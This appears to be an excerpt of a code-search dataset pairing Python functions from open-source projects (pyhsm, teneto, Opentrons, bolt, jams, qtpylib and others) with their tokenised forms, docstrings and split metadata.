def parse_result(self, data): """ Returns a YHSM_GeneratedAEAD instance, or throws pyhsm.exception.YHSM_CommandFailed. """ # typedef struct { # uint8_t nonce[YSM_AEAD_NONCE_SIZE]; // Nonce (publicId for Yubikey AEADs) # uint32_t keyHandle; // Key handle # YSM_STATUS status; // Status # uint8_t numBytes; // Number of bytes in AEAD block # uint8_t aead[YSM_AEAD_MAX_SIZE]; // AEAD block # } YSM_AEAD_GENERATE_RESP; nonce, \ key_handle, \ self.status, \ num_bytes = struct.unpack_from("< %is I B B" % (pyhsm.defines.YSM_AEAD_NONCE_SIZE), data, 0) pyhsm.util.validate_cmd_response_hex('key_handle', key_handle, self.key_handle) if self.status == pyhsm.defines.YSM_STATUS_OK: pyhsm.util.validate_cmd_response_nonce(nonce, self.nonce) offset = pyhsm.defines.YSM_AEAD_NONCE_SIZE + 6 aead = data[offset:offset + num_bytes] self.response = YHSM_GeneratedAEAD(nonce, key_handle, aead) return self.response else: raise pyhsm.exception.YHSM_CommandFailed(pyhsm.defines.cmd2str(self.command), self.status)
[ "def", "parse_result", "(", "self", ",", "data", ")", ":", "# typedef struct {", "# uint8_t nonce[YSM_AEAD_NONCE_SIZE]; // Nonce (publicId for Yubikey AEADs)", "# uint32_t keyHandle; // Key handle", "# YSM_STATUS status; // Status", "# uint8_t numBytes; // Number of bytes in AEAD block", "# uint8_t aead[YSM_AEAD_MAX_SIZE]; // AEAD block", "# } YSM_AEAD_GENERATE_RESP;", "nonce", ",", "key_handle", ",", "self", ".", "status", ",", "num_bytes", "=", "struct", ".", "unpack_from", "(", "\"< %is I B B\"", "%", "(", "pyhsm", ".", "defines", ".", "YSM_AEAD_NONCE_SIZE", ")", ",", "data", ",", "0", ")", "pyhsm", ".", "util", ".", "validate_cmd_response_hex", "(", "'key_handle'", ",", "key_handle", ",", "self", ".", "key_handle", ")", "if", "self", ".", "status", "==", "pyhsm", ".", "defines", ".", "YSM_STATUS_OK", ":", "pyhsm", ".", "util", ".", "validate_cmd_response_nonce", "(", "nonce", ",", "self", ".", "nonce", ")", "offset", "=", "pyhsm", ".", "defines", ".", "YSM_AEAD_NONCE_SIZE", "+", "6", "aead", "=", "data", "[", "offset", ":", "offset", "+", "num_bytes", "]", "self", ".", "response", "=", "YHSM_GeneratedAEAD", "(", "nonce", ",", "key_handle", ",", "aead", ")", "return", "self", ".", "response", "else", ":", "raise", "pyhsm", ".", "exception", ".", "YHSM_CommandFailed", "(", "pyhsm", ".", "defines", ".", "cmd2str", "(", "self", ".", "command", ")", ",", "self", ".", "status", ")" ]
Returns a YHSM_GeneratedAEAD instance, or throws pyhsm.exception.YHSM_CommandFailed.
[ "Returns", "a", "YHSM_GeneratedAEAD", "instance", "or", "throws", "pyhsm", ".", "exception", ".", "YHSM_CommandFailed", "." ]
python
train
46.481481
kbr/fritzconnection
fritzconnection/fritzstatus.py
https://github.com/kbr/fritzconnection/blob/b183f759ef19dd1652371e912d36cfe34f6639ac/fritzconnection/fritzstatus.py#L118-L124
def str_transmission_rate(self): """Returns a tuple of human readable transmission rates in bytes.""" upstream, downstream = self.transmission_rate return ( fritztools.format_num(upstream), fritztools.format_num(downstream) )
[ "def", "str_transmission_rate", "(", "self", ")", ":", "upstream", ",", "downstream", "=", "self", ".", "transmission_rate", "return", "(", "fritztools", ".", "format_num", "(", "upstream", ")", ",", "fritztools", ".", "format_num", "(", "downstream", ")", ")" ]
Returns a tuple of human readable transmission rates in bytes.
[ "Returns", "a", "tuple", "of", "human", "readable", "transmission", "rates", "in", "bytes", "." ]
python
train
39.285714
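A sketch for the FritzStatus record above. The constructor arguments are placeholders for a reachable FRITZ!Box, and str_transmission_rate is read as a property here, which is assumed from how this class exposes its other status values:

from fritzconnection.fritzstatus import FritzStatus  # module path from the record

status = FritzStatus(address='192.168.178.1', password='secret')  # placeholder credentials

# Assumed property access; yields human-readable upstream/downstream rates.
upstream, downstream = status.str_transmission_rate
print('up: %s, down: %s' % (upstream, downstream))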
wiheto/teneto
teneto/classes/bids.py
https://github.com/wiheto/teneto/blob/80d7a83a9adc1714589b020627c45bd5b66248ab/teneto/classes/bids.py#L221-L320
def _derive_temporalnetwork(self, f, i, tag, params, confounds_exist, confound_files): """ Funciton called by TenetoBIDS.derive_temporalnetwork for concurrent processing. """ data = load_tabular_file(f, index_col=True, header=True) fs, _ = drop_bids_suffix(f) save_name, save_dir, _ = self._save_namepaths_bids_derivatives( fs, tag, 'tvc', 'tvcconn') if 'weight-var' in params.keys(): if params['weight-var'] == 'from-subject-fc': fc_files = self.get_selected_files( quiet=1, pipeline='functionalconnectivity', forfile=f) if len(fc_files) == 1: # Could change to load_data call params['weight-var'] = load_tabular_file( fc_files[0]).values else: raise ValueError('Cannot correctly find FC files') if 'weight-mean' in params.keys(): if params['weight-mean'] == 'from-subject-fc': fc_files = self.get_selected_files( quiet=1, pipeline='functionalconnectivity', forfile=f) if len(fc_files) == 1: # Could change to load_data call params['weight-mean'] = load_tabular_file( fc_files[0]).values else: raise ValueError('Cannot correctly find FC files') params['report'] = 'yes' params['report_path'] = save_dir + '/report/' params['report_filename'] = save_name + '_derivationreport.html' if not os.path.exists(params['report_path']): os.makedirs(params['report_path']) if 'dimord' not in params: params['dimord'] = 'time,node' dfc = teneto.timeseries.derive_temporalnetwork(data.values, params) dfc_net = TemporalNetwork(from_array=dfc, nettype='wu') dfc_net.network.to_csv(save_dir + save_name + '.tsv', sep='\t') sidecar = get_sidecar(f) sidecar['tvc'] = params if 'weight-var' in sidecar['tvc']: sidecar['tvc']['weight-var'] = True sidecar['tvc']['fc source'] = fc_files if 'weight-mean' in sidecar['tvc']: sidecar['tvc']['weight-mean'] = True sidecar['tvc']['fc source'] = fc_files sidecar['tvc']['inputfile'] = f sidecar['tvc']['description'] = 'Time varying connectivity information.' with open(save_dir + save_name + '.json', 'w') as fs: json.dump(sidecar, fs) if confounds_exist: analysis_step = 'tvc-derive' df = pd.read_csv(confound_files[i], sep='\t') df = df.fillna(df.median()) ind = np.triu_indices(dfc.shape[0], k=1) dfc_df = pd.DataFrame(dfc[ind[0], ind[1], :].transpose()) # If windowed, prune df so that it matches with dfc_df if len(df) != len(dfc_df): df = df.iloc[int(np.round((params['windowsize']-1)/2)): int(np.round((params['windowsize']-1)/2)+len(dfc_df))] df.reset_index(inplace=True, drop=True) # NOW CORRELATE DF WITH DFC BUT ALONG INDEX NOT DF. 
dfc_df_z = (dfc_df - dfc_df.mean()) df_z = (df - df.mean()) R_df = dfc_df_z.T.dot(df_z).div(len(dfc_df)).div( df_z.std(ddof=0)).div(dfc_df_z.std(ddof=0), axis=0) R_df_describe = R_df.describe() desc_index = R_df_describe.index confound_report_dir = params['report_path'] + \ '/' + save_name + '_confoundcorr/' confound_report_figdir = confound_report_dir + 'figures/' if not os.path.exists(confound_report_figdir): os.makedirs(confound_report_figdir) report = '<html><body>' report += '<h1> Correlation of ' + analysis_step + ' and confounds.</h1>' for c in R_df.columns: fig, ax = plt.subplots(1) ax = sns.distplot( R_df[c], hist=False, color='m', ax=ax, kde_kws={"shade": True}) fig.savefig(confound_report_figdir + c + '.png') plt.close(fig) report += '<h2>' + c + '</h2>' for ind_name, r in enumerate(R_df_describe[c]): report += str(desc_index[ind_name]) + ': ' report += str(r) + '<br>' report += 'Distribution of corrlation values:' report += '<img src=' + \ os.path.abspath(confound_report_figdir) + \ '/' + c + '.png><br><br>' report += '</body></html>' with open(confound_report_dir + save_name + '_confoundcorr.html', 'w') as file: file.write(report)
[ "def", "_derive_temporalnetwork", "(", "self", ",", "f", ",", "i", ",", "tag", ",", "params", ",", "confounds_exist", ",", "confound_files", ")", ":", "data", "=", "load_tabular_file", "(", "f", ",", "index_col", "=", "True", ",", "header", "=", "True", ")", "fs", ",", "_", "=", "drop_bids_suffix", "(", "f", ")", "save_name", ",", "save_dir", ",", "_", "=", "self", ".", "_save_namepaths_bids_derivatives", "(", "fs", ",", "tag", ",", "'tvc'", ",", "'tvcconn'", ")", "if", "'weight-var'", "in", "params", ".", "keys", "(", ")", ":", "if", "params", "[", "'weight-var'", "]", "==", "'from-subject-fc'", ":", "fc_files", "=", "self", ".", "get_selected_files", "(", "quiet", "=", "1", ",", "pipeline", "=", "'functionalconnectivity'", ",", "forfile", "=", "f", ")", "if", "len", "(", "fc_files", ")", "==", "1", ":", "# Could change to load_data call", "params", "[", "'weight-var'", "]", "=", "load_tabular_file", "(", "fc_files", "[", "0", "]", ")", ".", "values", "else", ":", "raise", "ValueError", "(", "'Cannot correctly find FC files'", ")", "if", "'weight-mean'", "in", "params", ".", "keys", "(", ")", ":", "if", "params", "[", "'weight-mean'", "]", "==", "'from-subject-fc'", ":", "fc_files", "=", "self", ".", "get_selected_files", "(", "quiet", "=", "1", ",", "pipeline", "=", "'functionalconnectivity'", ",", "forfile", "=", "f", ")", "if", "len", "(", "fc_files", ")", "==", "1", ":", "# Could change to load_data call", "params", "[", "'weight-mean'", "]", "=", "load_tabular_file", "(", "fc_files", "[", "0", "]", ")", ".", "values", "else", ":", "raise", "ValueError", "(", "'Cannot correctly find FC files'", ")", "params", "[", "'report'", "]", "=", "'yes'", "params", "[", "'report_path'", "]", "=", "save_dir", "+", "'/report/'", "params", "[", "'report_filename'", "]", "=", "save_name", "+", "'_derivationreport.html'", "if", "not", "os", ".", "path", ".", "exists", "(", "params", "[", "'report_path'", "]", ")", ":", "os", ".", "makedirs", "(", "params", "[", "'report_path'", "]", ")", "if", "'dimord'", "not", "in", "params", ":", "params", "[", "'dimord'", "]", "=", "'time,node'", "dfc", "=", "teneto", ".", "timeseries", ".", "derive_temporalnetwork", "(", "data", ".", "values", ",", "params", ")", "dfc_net", "=", "TemporalNetwork", "(", "from_array", "=", "dfc", ",", "nettype", "=", "'wu'", ")", "dfc_net", ".", "network", ".", "to_csv", "(", "save_dir", "+", "save_name", "+", "'.tsv'", ",", "sep", "=", "'\\t'", ")", "sidecar", "=", "get_sidecar", "(", "f", ")", "sidecar", "[", "'tvc'", "]", "=", "params", "if", "'weight-var'", "in", "sidecar", "[", "'tvc'", "]", ":", "sidecar", "[", "'tvc'", "]", "[", "'weight-var'", "]", "=", "True", "sidecar", "[", "'tvc'", "]", "[", "'fc source'", "]", "=", "fc_files", "if", "'weight-mean'", "in", "sidecar", "[", "'tvc'", "]", ":", "sidecar", "[", "'tvc'", "]", "[", "'weight-mean'", "]", "=", "True", "sidecar", "[", "'tvc'", "]", "[", "'fc source'", "]", "=", "fc_files", "sidecar", "[", "'tvc'", "]", "[", "'inputfile'", "]", "=", "f", "sidecar", "[", "'tvc'", "]", "[", "'description'", "]", "=", "'Time varying connectivity information.'", "with", "open", "(", "save_dir", "+", "save_name", "+", "'.json'", ",", "'w'", ")", "as", "fs", ":", "json", ".", "dump", "(", "sidecar", ",", "fs", ")", "if", "confounds_exist", ":", "analysis_step", "=", "'tvc-derive'", "df", "=", "pd", ".", "read_csv", "(", "confound_files", "[", "i", "]", ",", "sep", "=", "'\\t'", ")", "df", "=", "df", ".", "fillna", "(", "df", ".", "median", "(", ")", ")", "ind", "=", "np", ".", 
"triu_indices", "(", "dfc", ".", "shape", "[", "0", "]", ",", "k", "=", "1", ")", "dfc_df", "=", "pd", ".", "DataFrame", "(", "dfc", "[", "ind", "[", "0", "]", ",", "ind", "[", "1", "]", ",", ":", "]", ".", "transpose", "(", ")", ")", "# If windowed, prune df so that it matches with dfc_df", "if", "len", "(", "df", ")", "!=", "len", "(", "dfc_df", ")", ":", "df", "=", "df", ".", "iloc", "[", "int", "(", "np", ".", "round", "(", "(", "params", "[", "'windowsize'", "]", "-", "1", ")", "/", "2", ")", ")", ":", "int", "(", "np", ".", "round", "(", "(", "params", "[", "'windowsize'", "]", "-", "1", ")", "/", "2", ")", "+", "len", "(", "dfc_df", ")", ")", "]", "df", ".", "reset_index", "(", "inplace", "=", "True", ",", "drop", "=", "True", ")", "# NOW CORRELATE DF WITH DFC BUT ALONG INDEX NOT DF.", "dfc_df_z", "=", "(", "dfc_df", "-", "dfc_df", ".", "mean", "(", ")", ")", "df_z", "=", "(", "df", "-", "df", ".", "mean", "(", ")", ")", "R_df", "=", "dfc_df_z", ".", "T", ".", "dot", "(", "df_z", ")", ".", "div", "(", "len", "(", "dfc_df", ")", ")", ".", "div", "(", "df_z", ".", "std", "(", "ddof", "=", "0", ")", ")", ".", "div", "(", "dfc_df_z", ".", "std", "(", "ddof", "=", "0", ")", ",", "axis", "=", "0", ")", "R_df_describe", "=", "R_df", ".", "describe", "(", ")", "desc_index", "=", "R_df_describe", ".", "index", "confound_report_dir", "=", "params", "[", "'report_path'", "]", "+", "'/'", "+", "save_name", "+", "'_confoundcorr/'", "confound_report_figdir", "=", "confound_report_dir", "+", "'figures/'", "if", "not", "os", ".", "path", ".", "exists", "(", "confound_report_figdir", ")", ":", "os", ".", "makedirs", "(", "confound_report_figdir", ")", "report", "=", "'<html><body>'", "report", "+=", "'<h1> Correlation of '", "+", "analysis_step", "+", "' and confounds.</h1>'", "for", "c", "in", "R_df", ".", "columns", ":", "fig", ",", "ax", "=", "plt", ".", "subplots", "(", "1", ")", "ax", "=", "sns", ".", "distplot", "(", "R_df", "[", "c", "]", ",", "hist", "=", "False", ",", "color", "=", "'m'", ",", "ax", "=", "ax", ",", "kde_kws", "=", "{", "\"shade\"", ":", "True", "}", ")", "fig", ".", "savefig", "(", "confound_report_figdir", "+", "c", "+", "'.png'", ")", "plt", ".", "close", "(", "fig", ")", "report", "+=", "'<h2>'", "+", "c", "+", "'</h2>'", "for", "ind_name", ",", "r", "in", "enumerate", "(", "R_df_describe", "[", "c", "]", ")", ":", "report", "+=", "str", "(", "desc_index", "[", "ind_name", "]", ")", "+", "': '", "report", "+=", "str", "(", "r", ")", "+", "'<br>'", "report", "+=", "'Distribution of corrlation values:'", "report", "+=", "'<img src='", "+", "os", ".", "path", ".", "abspath", "(", "confound_report_figdir", ")", "+", "'/'", "+", "c", "+", "'.png><br><br>'", "report", "+=", "'</body></html>'", "with", "open", "(", "confound_report_dir", "+", "save_name", "+", "'_confoundcorr.html'", ",", "'w'", ")", "as", "file", ":", "file", ".", "write", "(", "report", ")" ]
Function called by TenetoBIDS.derive_temporalnetwork for concurrent processing.
[ "Function", "called", "by", "TenetoBIDS", ".", "derive_temporalnetwork", "for", "concurrent", "processing", "." ]
python
train
47.32
DataONEorg/d1_python
lib_client/src/d1_client/solr_client.py
https://github.com/DataONEorg/d1_python/blob/3ac4d4f3ca052d3e8641a6a329cab526c8ddcb0d/lib_client/src/d1_client/solr_client.py#L506-L510
def _post_query(self, **query_dict): """Perform a POST query against Solr and return the response as a Python dict.""" param_dict = query_dict.copy() return self._send_query(do_post=True, **param_dict)
[ "def", "_post_query", "(", "self", ",", "*", "*", "query_dict", ")", ":", "param_dict", "=", "query_dict", ".", "copy", "(", ")", "return", "self", ".", "_send_query", "(", "do_post", "=", "True", ",", "*", "*", "param_dict", ")" ]
Perform a POST query against Solr and return the response as a Python dict.
[ "Perform", "a", "POST", "query", "against", "Solr", "and", "return", "the", "response", "as", "a", "Python", "dict", "." ]
python
train
45.8
bwhite/hadoopy
hadoopy/thirdparty/pyinstaller/PyInstaller/compat.py
https://github.com/bwhite/hadoopy/blob/ff39b4e6d4e6efaf1f571cf0f2c0e0d7ab28c2d6/hadoopy/thirdparty/pyinstaller/PyInstaller/compat.py#L197-L204
def exec_python_rc(*args, **kwargs): """ Wrap running python script in a subprocess. Return exit code of the invoked command. """ cmdargs, kwargs = __wrap_python(args, kwargs) return exec_command_rc(*cmdargs, **kwargs)
[ "def", "exec_python_rc", "(", "*", "args", ",", "*", "*", "kwargs", ")", ":", "cmdargs", ",", "kwargs", "=", "__wrap_python", "(", "args", ",", "kwargs", ")", "return", "exec_command_rc", "(", "*", "cmdargs", ",", "*", "*", "kwargs", ")" ]
Wrap running python script in a subprocess. Return exit code of the invoked command.
[ "Wrap", "running", "python", "script", "in", "a", "subprocess", "." ]
python
train
29.5
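A sketch of the exec_python_rc helper above; the import path follows the vendored PyInstaller copy named in the record and is an assumption:

from PyInstaller.compat import exec_python_rc

# Write a throwaway script and run it in a fresh Python subprocess.
with open('exit_check.py', 'w') as fh:
    fh.write('import sys; sys.exit(3)\n')

rc = exec_python_rc('exit_check.py')
print(rc)  # 3: the child's exit status, not its output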
Opentrons/opentrons
api/src/opentrons/legacy_api/instruments/pipette.py
https://github.com/Opentrons/opentrons/blob/a7c15cc2636ecb64ab56c7edc1d8a57163aaeadf/api/src/opentrons/legacy_api/instruments/pipette.py#L250-L268
def reset_tip_tracking(self): """ Resets the :any:`Pipette` tip tracking, "refilling" the tip racks """ self.current_tip(None) self.tip_rack_iter = iter([]) if self.has_tip_rack(): iterables = self.tip_racks if self.channels > 1: iterables = [c for rack in self.tip_racks for c in rack.cols] else: iterables = [w for rack in self.tip_racks for w in rack] if self.starting_tip: iterables = iterables[iterables.index(self.starting_tip):] self.tip_rack_iter = itertools.chain(iterables)
[ "def", "reset_tip_tracking", "(", "self", ")", ":", "self", ".", "current_tip", "(", "None", ")", "self", ".", "tip_rack_iter", "=", "iter", "(", "[", "]", ")", "if", "self", ".", "has_tip_rack", "(", ")", ":", "iterables", "=", "self", ".", "tip_racks", "if", "self", ".", "channels", ">", "1", ":", "iterables", "=", "[", "c", "for", "rack", "in", "self", ".", "tip_racks", "for", "c", "in", "rack", ".", "cols", "]", "else", ":", "iterables", "=", "[", "w", "for", "rack", "in", "self", ".", "tip_racks", "for", "w", "in", "rack", "]", "if", "self", ".", "starting_tip", ":", "iterables", "=", "iterables", "[", "iterables", ".", "index", "(", "self", ".", "starting_tip", ")", ":", "]", "self", ".", "tip_rack_iter", "=", "itertools", ".", "chain", "(", "iterables", ")" ]
Resets the :any:`Pipette` tip tracking, "refilling" the tip racks
[ "Resets", "the", ":", "any", ":", "Pipette", "tip", "tracking", "refilling", "the", "tip", "racks" ]
python
train
32.894737
bolt-project/bolt
bolt/spark/chunk.py
https://github.com/bolt-project/bolt/blob/9cd7104aa085498da3097b72696184b9d3651c51/bolt/spark/chunk.py#L434-L512
def getplan(self, size="150", axes=None, padding=None): """ Identify a plan for chunking values along each dimension. Generates an ndarray with the size (in number of elements) of chunks in each dimension. If provided, will estimate chunks for only a subset of axes, leaving all others to the full size of the axis. Parameters ---------- size : string or tuple If str, the average size (in KB) of the chunks in all value dimensions. If int/tuple, an explicit specification of the number chunks in each moving value dimension. axes : tuple, optional, default=None One or more axes to estimate chunks for, if provided any other axes will use one chunk. padding : tuple or int, option, default=None Size over overlapping padding between chunks in each dimension. If tuple, specifies padding along each chunked dimension; if int, all dimensions use same padding; if None, no padding """ from numpy import dtype as gettype # initialize with all elements in one chunk plan = self.vshape # check for subset of axes if axes is None: if isinstance(size, str): axes = arange(len(self.vshape)) else: axes = arange(len(size)) else: axes = asarray(axes, 'int') # set padding pad = array(len(self.vshape)*[0, ]) if padding is not None: pad[axes] = padding # set the plan if isinstance(size, tuple): plan[axes] = size elif isinstance(size, str): # convert from kilobytes size = 1000.0 * float(size) # calculate from dtype elsize = gettype(self.dtype).itemsize nelements = prod(self.vshape) dims = self.vshape[self.vmask(axes)] if size <= elsize: s = ones(len(axes)) else: remsize = 1.0 * nelements * elsize s = [] for (i, d) in enumerate(dims): minsize = remsize/d if minsize >= size: s.append(1) remsize = minsize continue else: s.append(min(d, floor(size/minsize))) s[i+1:] = plan[i+1:] break plan[axes] = s else: raise ValueError("Chunk size not understood, must be tuple or int") return plan, pad
[ "def", "getplan", "(", "self", ",", "size", "=", "\"150\"", ",", "axes", "=", "None", ",", "padding", "=", "None", ")", ":", "from", "numpy", "import", "dtype", "as", "gettype", "# initialize with all elements in one chunk", "plan", "=", "self", ".", "vshape", "# check for subset of axes", "if", "axes", "is", "None", ":", "if", "isinstance", "(", "size", ",", "str", ")", ":", "axes", "=", "arange", "(", "len", "(", "self", ".", "vshape", ")", ")", "else", ":", "axes", "=", "arange", "(", "len", "(", "size", ")", ")", "else", ":", "axes", "=", "asarray", "(", "axes", ",", "'int'", ")", "# set padding", "pad", "=", "array", "(", "len", "(", "self", ".", "vshape", ")", "*", "[", "0", ",", "]", ")", "if", "padding", "is", "not", "None", ":", "pad", "[", "axes", "]", "=", "padding", "# set the plan", "if", "isinstance", "(", "size", ",", "tuple", ")", ":", "plan", "[", "axes", "]", "=", "size", "elif", "isinstance", "(", "size", ",", "str", ")", ":", "# convert from kilobytes", "size", "=", "1000.0", "*", "float", "(", "size", ")", "# calculate from dtype", "elsize", "=", "gettype", "(", "self", ".", "dtype", ")", ".", "itemsize", "nelements", "=", "prod", "(", "self", ".", "vshape", ")", "dims", "=", "self", ".", "vshape", "[", "self", ".", "vmask", "(", "axes", ")", "]", "if", "size", "<=", "elsize", ":", "s", "=", "ones", "(", "len", "(", "axes", ")", ")", "else", ":", "remsize", "=", "1.0", "*", "nelements", "*", "elsize", "s", "=", "[", "]", "for", "(", "i", ",", "d", ")", "in", "enumerate", "(", "dims", ")", ":", "minsize", "=", "remsize", "/", "d", "if", "minsize", ">=", "size", ":", "s", ".", "append", "(", "1", ")", "remsize", "=", "minsize", "continue", "else", ":", "s", ".", "append", "(", "min", "(", "d", ",", "floor", "(", "size", "/", "minsize", ")", ")", ")", "s", "[", "i", "+", "1", ":", "]", "=", "plan", "[", "i", "+", "1", ":", "]", "break", "plan", "[", "axes", "]", "=", "s", "else", ":", "raise", "ValueError", "(", "\"Chunk size not understood, must be tuple or int\"", ")", "return", "plan", ",", "pad" ]
Identify a plan for chunking values along each dimension. Generates an ndarray with the size (in number of elements) of chunks in each dimension. If provided, will estimate chunks for only a subset of axes, leaving all others to the full size of the axis. Parameters ---------- size : string or tuple If str, the average size (in KB) of the chunks in all value dimensions. If int/tuple, an explicit specification of the number chunks in each moving value dimension. axes : tuple, optional, default=None One or more axes to estimate chunks for, if provided any other axes will use one chunk. padding : tuple or int, option, default=None Size over overlapping padding between chunks in each dimension. If tuple, specifies padding along each chunked dimension; if int, all dimensions use same padding; if None, no padding
[ "Identify", "a", "plan", "for", "chunking", "values", "along", "each", "dimension", "." ]
python
test
32.974684
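For the string-size branch above, a rough standalone sketch (not the bolt API itself; padding and the explicit tuple branch are ignored, and the shape and itemsize below are made-up inputs) shows how the per-dimension chunk sizes come out:

from math import floor
import numpy as np

def estimate_chunks(vshape, itemsize, size_kb=150.0):
    # Walk the value dimensions; the first dimension that can be split into
    # chunks of roughly size_kb kilobytes gets split, later dimensions stay whole.
    size = 1000.0 * size_kb
    plan = list(vshape)
    remsize = float(np.prod(vshape)) * itemsize
    s = []
    for i, d in enumerate(vshape):
        minsize = remsize / d            # bytes carried by one index of this dimension
        if minsize >= size:
            s.append(1)
            remsize = minsize
            continue
        s.append(int(min(d, floor(size / minsize))))
        s[i + 1:] = plan[i + 1:]
        break
    return s

print(estimate_chunks((1000, 1000), itemsize=8))   # [18, 1000]: 18x1000 float64 chunks, ~144 KB each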
hfaran/progressive
progressive/util.py
https://github.com/hfaran/progressive/blob/e39c7fb17405dbe997c3417a5993b94ef16dab0a/progressive/util.py#L34-L45
def merge_dicts(dicts, deepcopy=False): """Merges dicts In case of key conflicts, the value kept will be from the latter dictionary in the list of dictionaries :param dicts: [dict, ...] :param deepcopy: deepcopy items within dicts """ assert isinstance(dicts, list) and all(isinstance(d, dict) for d in dicts) return dict(chain(*[copy.deepcopy(d).items() if deepcopy else d.items() for d in dicts]))
[ "def", "merge_dicts", "(", "dicts", ",", "deepcopy", "=", "False", ")", ":", "assert", "isinstance", "(", "dicts", ",", "list", ")", "and", "all", "(", "isinstance", "(", "d", ",", "dict", ")", "for", "d", "in", "dicts", ")", "return", "dict", "(", "chain", "(", "*", "[", "copy", ".", "deepcopy", "(", "d", ")", ".", "items", "(", ")", "if", "deepcopy", "else", "d", ".", "items", "(", ")", "for", "d", "in", "dicts", "]", ")", ")" ]
Merges dicts In case of key conflicts, the value kept will be from the latter dictionary in the list of dictionaries :param dicts: [dict, ...] :param deepcopy: deepcopy items within dicts
[ "Merges", "dicts" ]
python
train
37.166667
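A minimal usage sketch of the merging rule above, reimplemented standalone on the standard library so the key-conflict behaviour is easy to verify (later dictionaries win):

import copy
from itertools import chain

def merge_dicts(dicts, deepcopy=False):
    # Later dicts override earlier ones on key conflicts; deepcopy=True copies nested values.
    assert isinstance(dicts, list) and all(isinstance(d, dict) for d in dicts)
    return dict(chain(*[copy.deepcopy(d).items() if deepcopy else d.items()
                        for d in dicts]))

print(merge_dicts([{'a': 1, 'b': 2}, {'b': 3}]))   # {'a': 1, 'b': 3}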
marl/jams
jams/core.py
https://github.com/marl/jams/blob/b16778399b9528efbd71434842a079f7691a7a66/jams/core.py#L1065-L1087
def to_interval_values(self): '''Extract observation data in a `mir_eval`-friendly format. Returns ------- intervals : np.ndarray [shape=(n, 2), dtype=float] Start- and end-times of all valued intervals `intervals[i, :] = [time[i], time[i] + duration[i]]` labels : list List view of value field. ''' ints, vals = [], [] for obs in self.data: ints.append([obs.time, obs.time + obs.duration]) vals.append(obs.value) if not ints: return np.empty(shape=(0, 2), dtype=float), [] return np.array(ints), vals
[ "def", "to_interval_values", "(", "self", ")", ":", "ints", ",", "vals", "=", "[", "]", ",", "[", "]", "for", "obs", "in", "self", ".", "data", ":", "ints", ".", "append", "(", "[", "obs", ".", "time", ",", "obs", ".", "time", "+", "obs", ".", "duration", "]", ")", "vals", ".", "append", "(", "obs", ".", "value", ")", "if", "not", "ints", ":", "return", "np", ".", "empty", "(", "shape", "=", "(", "0", ",", "2", ")", ",", "dtype", "=", "float", ")", ",", "[", "]", "return", "np", ".", "array", "(", "ints", ")", ",", "vals" ]
Extract observation data in a `mir_eval`-friendly format. Returns ------- intervals : np.ndarray [shape=(n, 2), dtype=float] Start- and end-times of all valued intervals `intervals[i, :] = [time[i], time[i] + duration[i]]` labels : list List view of value field.
[ "Extract", "observation", "data", "in", "a", "mir_eval", "-", "friendly", "format", "." ]
python
valid
27.695652
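The interval construction above can be sketched without the jams Annotation class; assuming observations expose time, duration and value fields (the Observation namedtuple below is a hypothetical stand-in), the same mir_eval-style pair looks like this:

from collections import namedtuple
import numpy as np

Observation = namedtuple('Observation', 'time duration value')   # hypothetical stand-in for a jams observation

def to_interval_values(observations):
    # Each interval is [start, start + duration]; labels mirror the value field.
    ints, vals = [], []
    for obs in observations:
        ints.append([obs.time, obs.time + obs.duration])
        vals.append(obs.value)
    if not ints:
        return np.empty(shape=(0, 2), dtype=float), []
    return np.array(ints), vals

intervals, labels = to_interval_values([Observation(0.0, 0.5, 'C:maj'),
                                        Observation(0.5, 0.5, 'G:maj')])
print(intervals.shape, labels)   # (2, 2) ['C:maj', 'G:maj']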
CivicSpleen/ambry
ambry/orm/column.py
https://github.com/CivicSpleen/ambry/blob/d7f2be4bf1f7ffd086f3fadd4fcae60c32473e42/ambry/orm/column.py#L249-L252
def is_measure(self): """Return True if the column is a measure""" from ambry.valuetype.core import ROLE return self.role == ROLE.MEASURE
[ "def", "is_measure", "(", "self", ")", ":", "from", "ambry", ".", "valuetype", ".", "core", "import", "ROLE", "return", "self", ".", "role", "==", "ROLE", ".", "MEASURE" ]
Return True if the column is a measure
[ "Return", "true", "if", "the", "colum", "is", "a", "dimension" ]
python
train
39.75
ranaroussi/qtpylib
qtpylib/blotter.py
https://github.com/ranaroussi/qtpylib/blob/0dbbc465fafd9cb9b0f4d10e1e07fae4e15032dd/qtpylib/blotter.py#L887-L950
def _fix_history_sequence(self, df, table): """ fix out-of-sequence ticks/bars """ # remove "Unnamed: x" columns cols = df.columns[df.columns.str.startswith('Unnamed:')].tolist() df.drop(cols, axis=1, inplace=True) # remove future dates df['datetime'] = pd.to_datetime(df['datetime'], utc=True) blacklist = df[df['datetime'] > pd.to_datetime('now', utc=True)] df = df.loc[set(df.index) - set(blacklist)] # .tail() # loop through data, symbol by symbol dfs = [] bad_ids = [blacklist['id'].values.tolist()] for symbol_id in list(df['symbol_id'].unique()): data = df[df['symbol_id'] == symbol_id].copy() # sort by id data.sort_values('id', axis=0, ascending=True, inplace=False) # convert index to column data.loc[:, "ix"] = data.index data.reset_index(inplace=True) # find out of sequence ticks/bars malformed = data.shift(1)[(data['id'] > data['id'].shift(1)) & ( data['datetime'] < data['datetime'].shift(1))] # cleanup rows if malformed.empty: # if all rows are in sequence, just remove last row dfs.append(data) else: # remove out of sequence rows + last row from data index = [ x for x in data.index.values if x not in malformed['ix'].values] dfs.append(data.loc[index]) # add to bad id list (to remove from db) bad_ids.append(list(malformed['id'].values)) # combine all lists data = pd.concat(dfs, sort=True) # flatten bad ids bad_ids = sum(bad_ids, []) # remove bad ids from db if bad_ids: bad_ids = list(map(str, map(int, bad_ids))) self.dbcurr.execute("DELETE FROM greeks WHERE %s IN (%s)" % ( table.lower()[:-1] + "_id", ",".join(bad_ids))) self.dbcurr.execute("DELETE FROM " + table.lower() + " WHERE id IN (%s)" % (",".join(bad_ids))) try: self.dbconn.commit() except Exception as e: self.dbconn.rollback() # return return data.drop(['id', 'ix', 'index'], axis=1)
